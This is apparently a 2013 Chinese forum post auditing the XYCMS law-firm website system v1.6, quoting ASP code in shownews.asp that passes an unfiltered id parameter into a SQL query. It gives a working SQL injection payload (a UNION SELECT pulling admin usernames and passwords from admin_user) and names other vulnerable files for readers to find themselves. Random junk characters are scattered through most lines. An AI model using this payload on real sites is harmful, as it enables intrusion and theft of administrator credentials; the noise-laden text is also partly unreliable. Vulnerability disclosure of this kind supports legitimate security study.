前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似3 G9 s7 b/ {1 p! ]/ D% Y- D
! w3 o4 k0 O$ d9 R7 J淫荡分割线: d% H( @/ j S, P
--------------------------------------------------------
# r2 _6 x/ C8 S" W* i C
. W/ O' U: o! p审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)' U6 W1 O2 |7 x$ T( W
源码地址:http://down.chinaz.com/soft/29233.htm2 k. h, Z' m( W4 |4 O6 Z
0 J2 A, W# B% v漏洞文件:shownews.asp3 ^" S7 m8 t1 e$ @
漏洞代码:7-13行5 C' Y) _; e+ z* W1 X7 m W
. m! V9 n% {8 ~5 p7 d, m
& X2 M+ F- _) y: M<%
6 q$ H @" W* {; q) pid=request.QueryString("id")
" I# Q6 `% V6 K# T3 [
6 S c- L* H$ G! z, x& @+ k; Qset snews=server.createobject("adodb.recordset")
3 D5 h- o' T3 {# s o1 Wexec="select * from [news] where id="&id% y; ]% ]) |2 F9 T9 h: X/ i
snews.open exec,conn,1,1, g- b3 h* d3 A7 a
%>
9 A2 p: J2 h7 m+ Q8 k l- D1 Y) w1 {6 _
: f8 C; N4 J% O$ R0 H, S5 c$ h J
什么过滤都没有 直造成注入$ m; d- K6 [$ n2 {5 e# z! ]
9 H. Z7 d7 o. @注入点:http://127.0.0.1:99/shownews.asp?id=xx! O u' N* m6 |8 W! `
" P8 i& M' `8 E. b( w8 R其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找# s# [' Q' @# [" m) Y/ J
4 R7 T- v. v/ V
9 x B8 {$ A' x- B3 u: P$ hexp: union select 1,admin,password,4,5,7 from admin_user% M" ?3 q! N2 \1 a) B$ H- q' w9 _
' k0 D# y8 x1 T' F, X+ J8 j
|
发表于 2013-4-4 17:28:12
收藏
支持
反对